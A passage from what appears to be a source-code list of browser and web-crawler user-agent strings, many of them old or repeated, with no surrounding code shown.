'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
